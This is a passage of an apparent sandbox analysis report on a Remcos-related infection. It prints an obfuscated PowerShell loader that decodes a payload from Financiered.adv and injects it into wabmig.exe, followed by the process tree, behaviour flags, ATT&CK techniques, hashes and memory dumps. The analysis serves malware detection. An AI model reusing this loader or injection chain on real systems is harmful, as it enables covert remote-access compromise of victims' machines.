tAdenoeJordesTrykstCu,pa- ointpPhycia utistCosmohForp Suffr$Ethnor CrepIRenowM Mi iiStrateP,lemr Nu m1Older3Phant1Visit)Hexam ');while (!$Studiepladsernes) {unhoard (Sereh 'Total$diskrg VrdilWh.ngoOverfbOrnita progl.verd:Sai aAOrgansI,eith Eidepfu,zelDigenaDelinnAfha tKabinsSt,ic=Tarnk$PalomtKup erAnp rusp,lleBlenn ') ;unhoard $Dekoreredes;unhoard (Sereh 'sparrSF nantAffolaInsolrGe.gatBrans- Si kSNonu.l BetseCorneeBeaujpvilia Senso4Rense ');unhoard (Sereh 'Stn p$Afr ggUbarblS ernoFaresbParafaHder,lInfek:AmmonS.fstetBaviaunomindWa deiNonfleHureapKurvelWei eaRetfrdE ingsIoni e Ko.trBioscnWeitseNab.ls.rkra=Nedfl(HylerT SleteCad tsBestitSprea-Ko,lePTalkiaFredstP rtuhfolke rus y$Con.iR,reoriPorsemSldefiHul,oetrogorTraum1 Skib3Trans1 I dr) Ly.t ') ;unhoard (Sereh 'Polyc$ Lykng Bodil,ctogo pecbSlowuadambrlGeogr:Yipv MSuccebP veblBant eSuppur Bestn BlideToste=Magni$Fors gVirkslBlecioLe,tybHyleraSk,ttlUdmrk:Sank BNon iaJonissL gosiKvs.enAnnuia PigesA ouriEnzyma P,onl Re u+kart + Surf%Folk,$AnikiPSpandoundisnSa ted SubceEpi.ori.veraIndpatDyspeiS ackoLe.finNonpo.Immanc I.mbo naruBenzynSwindtStemn ') ;$Otelcosis=$Ponderation[$Mblerne];}$Urskovsmrket=335640;$Tvivlsommerendri=27847;unhoard (Sereh 'Calci$IndaagD ssulThoraoKlaribTrs ia Metelfo db:OleacNtvinee Eurot bransAfsyrt Perpi,uppukDisrek bogreToyintCyklu Epos.=By,on Ud,kGafs nesyrphtKon.e-ChampCKommuoSkot nUnph t Pam eSeksun Lap.tOra g C li$Car aRFor wiFdselmHerniizarnieUnderrSyncr1Forsk3 Siza1Troi ');unhoard (Sereh 'Dec,m$Bobesg Eftel sagloKonsub,heotaSamf lEctom:bamseP B ckaCitolaMis ek,nvesrS rubeDishwn Wa ddBrak e Giri Logbo=Pre r Betrk[UnseaSkamplyolioss VefrtDiskeeHomeomApr.t.AscenC GangoFor lnUnporvRobeneDeplor So,ttUk,nt]Alkyl:A tho:FarveFSpinur Deplolunefm lysB T rba Snk sUnderepindl6Telef4Jims S anmatSnerprstatsi Domen,asarg typ,(Emb r$Skr uNn nebeSmrbotPh tosN.npetSuperiHeadfkTenorkGrunde.tatit Erhv) Raff ');unhoard (Sereh 'Yvonn$bardeghermelNonpao PegsbModsta B,skloppeb:GeigePPoloioGui ar .nobsGal o Ca t=Komme Impeo[DeadeSFigury nversOm,attLandfe kolkm K.nt.ArbejTMalapeTrianxBoreptOkeru.Pous EOverlnhlde cVelu.oForspd Ulc iNidd nM,strgHarpa]V,lut: f ik:m,lliA R.suSPhyciCknusmIDri tINiche.SladdG etmleGangwtInappS irkt H rrr R ntiForlanByporgRets (Ch on$AnthePSmagnaTrigla.revlkunquerkongeeshad nSoe,ed Col eSyste) Srkl ');unhoard (Sereh 'Fjern$ N,trg bratl Om toOverfbUndf a PhytlMelod:UdrmmKOver,iMu ams apitrTidssaFemto1Urano4 inti=No me$DeminP Trskognaverknbuks U de.MelansLo.ryuS ckebIdomesSt mmtNedsnr BramiAttringen.tgauthe(Gra s$,apabU SlavrS,ampsOptr.k K.ntoSkeldv Erods K ebm KlunrpaaklkStnineFranat Vrdi, vic$ChronTReklavMisdoiAntsivSubtrlSkylds ParaodelagmC lotmUnderekry drPersoeCr menVo.dsdRe,nnr forsiSp.og) Sprr ');unhoard $Kisra14;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2492
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Financiered.adv && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1148
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2252

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
9106a16cca4734e0644e782177a0b2e8

SHA1
3cccdb8b202f322ddaedc8d71a935571a20d6dc9

SHA256
775d404071d29c3837a58722bc4fdc6c876be817f2244f1962c0b58389e8d60d

SHA512
62c70afccfdf128b9c697762a90906962ffe297c01f470442f01e04db3f7702f23d527eef22be0b496af6b3ea2cd1d48f79b4b3beb7b2c033da114aa7e7061c2

Download Submit
C:\Users\Admin\AppData\Roaming\Financiered.adv

Filesize
473KB

MD5
2a226c84235f25cf9bee2bade90f7fc9

SHA1
c449226b64715a81000c566e37677b25953a7e4a

SHA256
d18add82262d9ddf210db5843c8a35b049e7d150c204bf22a77e9bd546f7eda3

SHA512
e57f9f378a53ab77e7306efb81aa806462353121ea3b0a4c8ae7549be1bdf00ea224d1f20e10956ba31cc8b6c63264193f6c2dfdf7e958747d8aa26cc0008be7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2RRQVIEG2F6TQ0GC8BLB.temp

Filesize
7KB

MD5
91277e6781ef199c6a15669f43263149

SHA1
2c2a076148546b2e296695bdba3382b3f9def8ea

SHA256
e98ddf0f4b97aa65c8f414d19b9543b9b1079aa06d5d7c0f11952ca154ff9cdd

SHA512
1975d724bb893e76b9db982925281b0609533a62816cd4614217082c9687721db2a37f0dde910c0cb02c4cce241f622b1bde7ec15e07fdb49944ac9ef9febe40

Download Submit
memory/2252-45-0x0000000001BD0000-0x00000000050B4000-memory.dmp

Filesize
52.9MB

Download
memory/2252-44-0x0000000000B60000-0x0000000001BC2000-memory.dmp

Filesize
16.4MB

Download
memory/2252-21-0x0000000001BD0000-0x00000000050B4000-memory.dmp

Filesize
52.9MB

Download
memory/2360-13-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

Filesize
4KB

Download
memory/2360-11-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2360-4-0x000007FEF65EE000-0x000007FEF65EF000-memory.dmp

Filesize
4KB

Download
memory/2360-10-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2360-17-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2360-9-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2360-19-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2360-8-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2360-5-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2360-46-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2360-6-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2360-7-0x000007FEF6330000-0x000007FEF6CCD000-memory.dmp

Filesize
9.6MB

Download
memory/2492-20-0x00000000066B0000-0x0000000009B94000-memory.dmp

Filesize
52.9MB

Download

Analysis

Sharing